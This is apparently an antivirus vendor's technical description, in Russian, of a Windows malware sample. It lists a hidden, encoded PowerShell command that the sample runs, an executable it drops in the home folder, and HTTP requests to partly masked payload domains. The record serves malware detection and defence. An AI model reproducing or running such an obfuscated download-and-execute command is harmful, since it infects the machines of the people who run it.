Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABGAFkASwBCAFcAeQBuAHQAPQAnAFUAQQBLAE8AUABxAGIAeAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYABDAFUAUgBpAHQAYAB5AHAAUgBvAHQATwBgAEMAYABPAGwAIgAgAD...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\882.exe
Удаляет следующие файлы
- %HOMEPATH%\882.exe
Сетевая активность
TCP
Запросы HTTP GET
- http://st###arc.com/assets/hoTVnj/
- http://so####ffairs.net/logs/yzht756773/
- http://su####vithomes.com/sathorncondos.com/N6dWb36edu55270418/
- http://ad#####rightslaw.org/yaook/ran/
- http://li###eart.co.jp/img/qyH/
UDP
- DNS ASK st###arc.com
- DNS ASK so####ffairs.net
- DNS ASK su####vithomes.com
- DNS ASK ad#####rightslaw.org
- DNS ASK ad#####rightslaw.com
- DNS ASK li###eart.co.jp
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABGAFkASwBCAFcAeQBuAHQAPQAnAFUAQQBLAE8AUABxAGIAeAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYABDAFUAUgBpAHQAYAB5AHAAUgBvAHQATwBgAEMAYABPAGwAIgAgAD...' (со скрытым окном)
